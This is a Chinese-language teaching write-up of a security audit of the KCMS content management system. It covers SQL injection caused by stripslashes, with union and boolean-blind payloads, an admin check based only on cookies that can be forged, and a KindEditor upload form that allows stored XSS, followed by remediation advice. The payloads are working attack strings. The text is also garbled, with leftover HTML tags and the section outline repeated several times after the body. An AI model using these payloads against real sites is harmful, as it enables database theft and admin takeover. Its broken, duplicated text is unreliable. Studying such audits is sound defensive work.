KCMS系统安全审计教学文档<\/h1>

0x00 系统概述<\/h2>
KCMS是一个内容管理系统，本次审计发现了多个安全漏洞，包括SQL注入、逻辑缺陷和XSS漏洞。这些漏洞主要源于全局过滤不完善、特定函数使用不当以及后台验证逻辑问题。<\/p>

0x01 全局过滤机制分析<\/h2>
文件路径<\/strong>: `\/system\/library.php<\/code><\/p>`

过滤实现<\/h3> 系统使用addslashes_deep<\/code>函数对输入数据进行转义处理：<\/p> if<\/span> (!<\/span>get_magic_quotes_gpc<\/span>()) { <\/span><\/span> if<\/span> (!<\/span>empty<\/span>($_GET)) { <\/span><\/span> $_GET =<\/span> addslashes_deep<\/span>($_GET); <\/span><\/span> } <\/span><\/span> if<\/span> (!<\/span>empty<\/span>($_POST)) { <\/span><\/span> $_POST =<\/span> addslashes_deep<\/span>($_POST); <\/span><\/span> } <\/span><\/span> $_COOKIE =<\/span> addslashes_deep<\/span>($_COOKIE); <\/span><\/span> $_REQUEST =<\/span> addslashes_deep<\/span>($_REQUEST); <\/span><\/span>} <\/span><\/span> <\/span><\/span>function<\/span> addslashes_deep<\/span>($_var_0) { <\/span><\/span> if<\/span> (empty<\/span>($_var_0)) { <\/span><\/span> return<\/span> $_var_0; <\/span><\/span> } else<\/span> { <\/span><\/span> return<\/span> is_array<\/span>($_var_0) ?<\/span> array_map<\/span>('addslashes_deep'<\/span>, $_var_0) :<\/span> addslashes<\/span>($_var_0); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点<\/h3> 使用addslashes<\/code>函数对$_GET<\/code>、$_POST<\/code>、$_COOKIE<\/code>和$_REQUEST<\/code>进行转义<\/li> 递归处理数组输入<\/li> 仅在magic_quotes_gpc<\/code>未启用时执行过滤<\/li> <\/ol> 0x02 前台SQL注入漏洞(1)<\/h2> 文件路径<\/strong>: \/ucenter\/active.php<\/code><\/p> 漏洞成因<\/h3> $_GET['verify']<\/code>经过stripslashes<\/code>函数处理，移除了addslashes<\/code>添加的反斜杠：<\/p> $verify =<\/span> stripslashes<\/span>(trim<\/span>($_GET['verify'<\/span>])); <\/span><\/span>$nowtime =<\/span> time<\/span>(); <\/span><\/span>$query =<\/span> mysqli_query<\/span>($conn,"select u_id from mkcms_user where u_question='<\/span>$verify<\/span>'"<\/span>); <\/span><\/span>$row =<\/span> mysqli_fetch_array<\/span>($query); <\/span><\/span><\/code><\/pre>利用方式<\/h3> 直接构造恶意输入，绕过转义<\/li> 存在回显，可使用联合查询注入<\/li> <\/ol> POC<\/strong>:<\/p> 1' union select version()%23 <\/code><\/pre> 0x03 前台SQL注入漏洞(2)<\/h2> 文件路径<\/strong>: \/ucenter\/reg.php<\/code><\/p> 漏洞成因<\/h3> 与0x02类似，stripslashes<\/code>移除了转义字符：<\/p> $username =<\/span> stripslashes<\/span>(trim<\/span>($_POST['name'<\/span>])); <\/span><\/span>$query =<\/span> mysqli_query<\/span>($conn,"select u_id from mkcms_user where u_name='<\/span>$username<\/span>'"<\/span>); <\/span><\/span><\/code><\/pre>利用方式<\/h3> 无回显，需使用布尔盲注<\/li> 通过不同响应判断注入结果<\/li> <\/ol> 验证方式<\/strong>:<\/p> 为真时提示"用户名已存在":<\/p> submit=1&name=x'or length(user())>1 %23 <\/code><\/pre> <\/li> 为假时提示"邮箱已存在":<\/p> submit=1&name=x'or length(user())>100 %23 <\/code><\/pre> <\/li> <\/ul> 0x04 后台登录逻辑缺陷<\/h2> 文件路径<\/strong>: admin\/cms_check.php<\/code><\/p> 漏洞详情<\/h3> 后台验证仅检查cookie中的用户名和密码：<\/p> $result =<\/span> mysqli_query<\/span>($conn,'select * from mkcms_manager where m_name = "'<\/span>.<\/span>$_COOKIE['admin_name'<\/span>].<\/span>'" and m_password = "'<\/span>.<\/span>$_COOKIE['admin_password'<\/span>]); <\/span><\/span>if<\/span> (!<\/span>$row =<\/span> mysqli_fetch_array<\/span>($result)) { <\/span><\/span> alert_href<\/span>('请重新登录'<\/span>,'cms_login.php'<\/span>); <\/span><\/span>}; <\/span><\/span><\/code><\/pre>利用方式<\/h3> 通过注入获取管理员凭证后伪造cookie<\/li> 直接暴力破解(无视验证码限制)<\/li> <\/ol> 0x05 KindEditor文件上传XSS<\/h2> 路径<\/strong>: \/editor\/php\/upload_json.php?dir=file<\/code><\/p> 漏洞详情<\/h3> 可上传HTML文件导致存储型XSS<\/p> 利用方式<\/h3> 构造恶意HTML表单上传文件<\/li> <\/ol> 示例攻击代码<\/strong>:<\/p> <html<\/span>> <\/span><\/span><head<\/span>><\/head<\/span>> <\/span><\/span><body<\/span>> <\/span><\/span><form<\/span> name<\/span>=<\/span>"form"<\/span> enctype<\/span>=<\/span>"multipart\/form-data"<\/span> method<\/span>=<\/span>"post"<\/span> action<\/span>=<\/span>"http:\/\/xxxxx.com\/editor\/php\/upload_json.php?dir=file"<\/span>> <\/span><\/span><input<\/span> type<\/span>=<\/span>"file"<\/span> name<\/span>=<\/span>"imgFile"<\/span> \/> <\/span><\/span><input<\/span> type<\/span>=<\/span>"submit"<\/span> value<\/span>=<\/span>"Submit"<\/span> \/> <\/span><\/span><\/form<\/span>> <\/span><\/span><\/body<\/span>> <\/span><\/span><\/html<\/span>> <\/span><\/span><\/code><\/pre>0x06 修复建议<\/h2> SQL注入<\/strong>:<\/p> 移除不必要的stripslashes<\/code>调用<\/li> 使用预处理语句替代字符串拼接<\/li> 统一输入过滤策略<\/li> <\/ul> <\/li> 后台验证<\/strong>:<\/p> 实现完善的会话管理<\/li> 使用服务端session而非cookie存储验证状态<\/li> 添加验证码保护<\/li> <\/ul> <\/li> 文件上传<\/strong>:<\/p> 严格限制上传文件类型<\/li> 对HTML文件进行特殊处理或禁止上传<\/li> 设置文件内容检查机制<\/li> <\/ul> <\/li> 全局过滤<\/strong>:<\/p> 考虑使用更现代的过滤方式如PDO预处理<\/li> 确保过滤策略一致且不可绕过<\/li> <\/ul> <\/li> <\/ol> 0x07 总结<\/h2> 本次审计揭示了KCMS系统中存在的多个高危漏洞，攻击者可利用这些漏洞进行SQL注入获取数据库信息、绕过后台认证、实施XSS攻击等。开发人员应重视输入验证、输出编码和身份验证机制的安全性，避免类似问题的发生。<\/p>

KCMS系统安全审计教学文档<\/h1>

0x00 系统概述<\/h2>
KCMS是一个内容管理系统，本次审计发现了多个安全漏洞，包括SQL注入、逻辑缺陷和XSS漏洞。这些漏洞主要源于全局过滤不完善、特定函数使用不当以及后台验证逻辑问题。<\/p>

0x01 全局过滤机制分析<\/h2>
文件路径<\/strong>: `\/system\/library.php<\/code><\/p>`

0x02 前台SQL注入漏洞(1)<\/h2>
文件路径<\/strong>: `\/ucenter\/active.php<\/code><\/p>`

0x03 前台SQL注入漏洞(2)<\/h2>
文件路径<\/strong>: `\/ucenter\/reg.php<\/code><\/p>`

0x04 后台登录逻辑缺陷<\/h2>
文件路径<\/strong>: `admin\/cms_check.php<\/code><\/p>`

0x05 KindEditor文件上传XSS<\/h2>
路径<\/strong>: `\/editor\/php\/upload_json.php?dir=file<\/code><\/p>`

KCMS系统安全审计教学文档<\/h1>

0x00 系统概述<\/h2> KCMS是一个内容管理系统，本次审计发现了多个安全漏洞，包括SQL注入、逻辑缺陷和XSS漏洞。这些漏洞主要源于全局过滤不完善、特定函数使用不当以及后台验证逻辑问题。<\/p>

0x01 全局过滤机制分析<\/h2> 文件路径<\/strong>: \/system\/library.php<\/code><\/p>

0x02 前台SQL注入漏洞(1)<\/h2> 文件路径<\/strong>: \/ucenter\/active.php<\/code><\/p>

0x03 前台SQL注入漏洞(2)<\/h2> 文件路径<\/strong>: \/ucenter\/reg.php<\/code><\/p>

0x04 后台登录逻辑缺陷<\/h2> 文件路径<\/strong>: admin\/cms_check.php<\/code><\/p>

0x05 KindEditor文件上传XSS<\/h2> 路径<\/strong>: \/editor\/php\/upload_json.php?dir=file<\/code><\/p>

0x00 系统概述<\/h2>
KCMS是一个内容管理系统，本次审计发现了多个安全漏洞，包括SQL注入、逻辑缺陷和XSS漏洞。这些漏洞主要源于全局过滤不完善、特定函数使用不当以及后台验证逻辑问题。<\/p>

0x01 全局过滤机制分析<\/h2>
文件路径<\/strong>: `\/system\/library.php<\/code><\/p>`

0x02 前台SQL注入漏洞(1)<\/h2>
文件路径<\/strong>: `\/ucenter\/active.php<\/code><\/p>`

0x03 前台SQL注入漏洞(2)<\/h2>
文件路径<\/strong>: `\/ucenter\/reg.php<\/code><\/p>`

0x04 后台登录逻辑缺陷<\/h2>
文件路径<\/strong>: `admin\/cms_check.php<\/code><\/p>`

0x05 KindEditor文件上传XSS<\/h2>
路径<\/strong>: `\/editor\/php\/upload_json.php?dir=file<\/code><\/p>`